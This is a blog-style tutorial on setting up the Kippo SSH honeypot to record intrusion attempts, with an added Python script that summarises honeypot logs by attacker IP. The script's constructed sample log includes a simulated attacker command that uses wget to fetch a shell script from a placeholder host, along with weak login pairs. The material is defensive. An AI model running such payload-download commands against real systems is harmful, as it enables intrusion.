SSH HoneyPot

I like to access some of my malware lab while I'm away, so I set myself up with DynDNS and some port forwarding. Opening up my home router like this is asking for trouble, especially when the ports being exposed are 80, 443 and 22, so I enabled syslogging for these ports on my router.

Going through my logs I see lots of connections coming in on port 22 from all over the world: 25 unique IP addresses over a three day period. I wanted to know more about these connections, but all syslog gives me is a timestamp and a source IP.

I needed more.

So I decided to set up a honeypot. There are several ways to do this, but I just wanted something specific to SSH that I could easily deploy on my ESXi host and leave ticking along.

This is where Kippo comes in handy. Kippo is an SSH honeypot designed to capture and record SSH connections.

It emulates a Debian system and responds to commands. It even lets the attacker "download" files (the honeypot fetches them and keeps a copy for analysis) and pretends to fulfil apt-get requests. You can limit or disable this facility, and you should consider doing so, since the honeypot itself makes the outbound request.

Every action the attacker takes is recorded and logged, including any files they attempted to download.

Here is a real-life session replay from the Kippo website:

http://kippo.rpg.fi/playlog/?l=20100316-233121-1847.log

Deploying Kippo

I start by deploying my standard Linux server OVA and setting it up with external access.

Move the real SSH daemon off the standard port so I can retain SSH/SCP access to recover logs and files without getting caught in my own trap:

sudo nano /etc/ssh/sshd_config

Edit the line Port 22 to something else. In my case:

Port 2223

Then restart the daemon (the original post had "sudo ssh restart", which is not a valid command; the service has to be restarted):

sudo service ssh restart

Keep your current session open and confirm you can log in on the new port before disconnecting, otherwise a typo in sshd_config locks you out of the VM.

Install Kippo

Only a couple of dependencies were required on top of my base install:

sudo apt-get install python-twisted git
git clone https://github.com/desaster/kippo
cd kippo

Configure Kippo

cp kippo.cfg.dist kippo.cfg
nano kippo.cfg

There are a fair few configuration options, and I would advise reading through them all. For this install only one change is required: bind Kippo to the VM's LAN address.

ssh_addr = 192.168.0.x

With Kippo configured we need to make sure that any traffic bound for port 22 is redirected to the Kippo VM and on to the port Kippo is listening on.

My router doesn't do port translation, so I forward external 22 to my Kippo VM on port 22.

On the Kippo VM I use iptables to redirect any port 22 traffic to the port Kippo is running on, which defaults to 2222 (a high port, so Kippo does not need to run as root to bind it):

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 2222

Two things worth knowing about this rule: REDIRECT keeps the original source address, so Kippo logs the attacker's real IP rather than the router's; and nat-table rules are not persistent, so re-add it (or save it with iptables-save) after a reboot. The rule only touches destination port 22, so the real sshd on 2223 is unaffected.

Start Kippo

With everything set up it's time to start Kippo and test that everything is working:

./start.sh

Testing is easy: I jump on my phone, make sure I'm not connected to the home Wi-Fi, and attempt a connection on port 22 from the outside.

With a successful connection I run a few commands, then exit.

Kippo Logs

Kippo stores logs in a couple of different places, all of which are set in the config file you should have read at the beginning :)

log/kippo.log (relative to the kippo directory) shows my connection, the login attempt and the commands I issued. Success. Interactive sessions are also recorded as TTY logs under log/tty/, which can be replayed with utils/playlog.py in the same way as the demo linked above.
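kippo.log is plain text, one line per event, so once a few hundred sessions have accumulated it is easier to summarise it than to read it. The script below is an added example, not part of the original post or of the Kippo project: it groups login attempts, successes and executed commands by attacker IP and pulls out the URLs passed to wget/curl. The sample lines are constructed in the style of kippo.log (the message texts "New connection:", "login attempt [user/pass] failed|succeeded" and "CMD:" are Kippo's; the exact logger prefix can differ between versions, so the regexes key only on those stable parts). Run it as `python kippo_summary.py log/kippo.log`, or with no argument to process the embedded sample.

```python
"""Summarise a Kippo kippo.log by attacker IP (added example, not Kippo's own code)."""
import re
import sys
from collections import defaultdict

# Constructed sample in the style of kippo.log; not real captured data.
SAMPLE_LOG = """\
2014-03-20 10:12:01+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.0.113.7:54321 (192.168.0.10:2222) [session: 1]
2014-03-20 10:12:03+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/123456] failed
2014-03-20 10:12:05+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/password] succeeded
2014-03-20 10:12:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: uname -a
2014-03-20 10:12:11+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: wget http://198.51.100.9/x.sh
2014-03-20 10:12:30+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 198.51.100.23:4022 (192.168.0.10:2222) [session: 2]
2014-03-20 10:12:31+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [admin/admin] failed
2014-03-20 10:12:32+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [admin/1234] failed
"""

# "<timestamp> [<logger>] <message>"; the logger never contains ']'.
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) \[(?P<logger>[^\]]*)\] (?P<msg>.*)$")
# The attacker IP sits at the end of the logger name once a transport exists.
TRANSPORT_RE = re.compile(r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)$")
NEW_CONN_RE = re.compile(r"New connection: (?P<ip>[\d.]+):\d+ .*\[session: (?P<sid>\d+)\]")
# User runs to the first '/', password is everything up to the final "] result".
LOGIN_RE = re.compile(r"login attempt \[(?P<user>[^/]*)/(?P<pw>.*)\] (?P<result>succeeded|failed)$")
CMD_RE = re.compile(r"CMD: (?P<cmd>.*)$")
URL_RE = re.compile(r"https?://\S+")


def _new_entry():
    return {"sessions": set(), "attempts": [], "successes": 0, "commands": []}


def summarise(log_text):
    """Return {ip: {"sessions", "attempts": [(user, pw, result)], "successes", "commands"}}."""
    stats = defaultdict(_new_entry)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation lines, tracebacks, etc.
        logger, msg = m.group("logger"), m.group("msg")
        conn = NEW_CONN_RE.search(msg)
        if conn:
            stats[conn.group("ip")]["sessions"].add(int(conn.group("sid")))
            continue
        tr = TRANSPORT_RE.search(logger)
        if not tr:
            continue  # factory/system messages with no attacker context
        entry = stats[tr.group("ip")]
        entry["sessions"].add(int(tr.group("sid")))
        lm = LOGIN_RE.search(msg)
        if lm:
            entry["attempts"].append((lm.group("user"), lm.group("pw"), lm.group("result")))
            if lm.group("result") == "succeeded":
                entry["successes"] += 1
            continue
        cm = CMD_RE.search(msg)
        if cm:
            entry["commands"].append(cm.group("cmd"))
    return dict(stats)


def fetched_urls(stats):
    """URLs the attacker asked the honeypot to fetch, per IP (wget/curl commands only)."""
    out = {}
    for ip, entry in stats.items():
        urls = [u for cmd in entry["commands"] if cmd.split()[:1] and cmd.split()[0] in ("wget", "curl")
                for u in URL_RE.findall(cmd)]
        if urls:
            out[ip] = urls
    return out


def report(stats):
    """Render a per-IP summary as text lines, busiest source first."""
    lines = []
    for ip, e in sorted(stats.items(), key=lambda kv: -len(kv[1]["attempts"])):
        lines.append("%s: %d session(s), %d login attempt(s), %d success(es), %d command(s)"
                     % (ip, len(e["sessions"]), len(e["attempts"]), e["successes"], len(e["commands"])))
        for user, pw, result in e["attempts"]:
            lines.append("    login %s/%s -> %s" % (user, pw, result))
        for cmd in e["commands"]:
            lines.append("    $ %s" % cmd)
    return lines


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    stats = summarise(text)
    print("\n".join(report(stats)))
    for ip, urls in fetched_urls(stats).items():
        print("%s requested downloads: %s" % (ip, ", ".join(urls)))
```

Grouping by the transport's IP rather than by session number is deliberate: a single bot typically opens many sessions, and what you want to know is which sources got past the password check and what they ran afterwards.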

Now it's just a matter of waiting for someone to try again.

If anyone makes a successful attempt I'll publish what I find. For now I leave you with a method for setting this up yourself.
